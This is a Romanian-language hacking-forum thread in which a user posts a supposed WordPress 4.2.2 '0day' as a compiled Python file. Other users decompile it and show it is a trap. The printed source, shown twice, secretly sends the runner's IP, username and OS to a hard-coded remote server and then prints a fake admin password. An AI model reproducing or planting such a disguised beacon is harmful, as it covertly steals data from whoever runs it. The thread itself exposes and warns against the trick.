Wordpress 4.2.2 0day

[1337]

Luat de pe un forum privat din afara.

Facut in Python, primul argument e site-ul.

Scoate userul si parola lui hashed.

Usage: wp4.2.2_0day.pyc site

// FAKE

Edited June 21, 2015 by Nytro

[valoaredaiamare]

RuntimeError: Bad magic number in .pyc file

[socket]

fake,

Edited June 21, 2015 by socket

[Worm64]

Fisierul decompilat:

# Embedded file name: test.py

import sys

import uuid

from md5 import md5

from urllib2 import urlopen

import platform

import os

import time

x = '[+] password: ' + md5(str(uuid.uuid4())).hexdigest()

x1 = 'http://46.101.188.181/a.php?t=' + urlopen('http://ip.42.pl/raw').read() + '_' + os.getenv('USERNAME') + '_' + platform.platform()

x2 = urlopen(x1).read()

if len(sys.argv) == 1:

sys.exit('No argument specified')

print 'Wordpress 4.2.2 0day exploit'

time.sleep(2)

print '[+] Trying: %s' % str(sys.argv[1])

time.sleep(5)

print '[+] user: admin'

time.sleep(3)

print x

[Speed123]

RuntimeError: Bad magic number in .pyc file

Se mai uita si la valoare.

Edited June 21, 2015 by Speed123

[Byte-ul]

# Embedded file name: test.py
import sys
import uuid
from md5 import md5
from urllib2 import urlopen
import platform
import os
import time
x = '[+] password: ' + md5(str(uuid.uuid4())).hexdigest()
x1 = 'http://46.101.188.181/a.php?t=' + urlopen('http://ip.42.pl/raw').read() + '_' + os.getenv('USERNAME') + '_' + platform.platform()
x2 = urlopen(x1).read()
if len(sys.argv) == 1:
    sys.exit('No argument specified')
print 'Wordpress 4.2.2 0day exploit'
time.sleep(2)
print '[+] Trying: %s' % str(sys.argv[1])
time.sleep(5)
print '[+] user: admin'
time.sleep(3)
print x

[askwrite]

[socket]

Cred ca este fake

[thepro]

//

Edited November 4, 2018 by thepro
Outdated.

[1337]

Well congrats, vad ca unii verifica ce ruleaza, altii nu prea.Asta tre' sa fie o lectie pentru toti. @Nytro trebuia sa-l lasi iar ceilalti trebuiau sa nu publice codul sursa.

rezultate: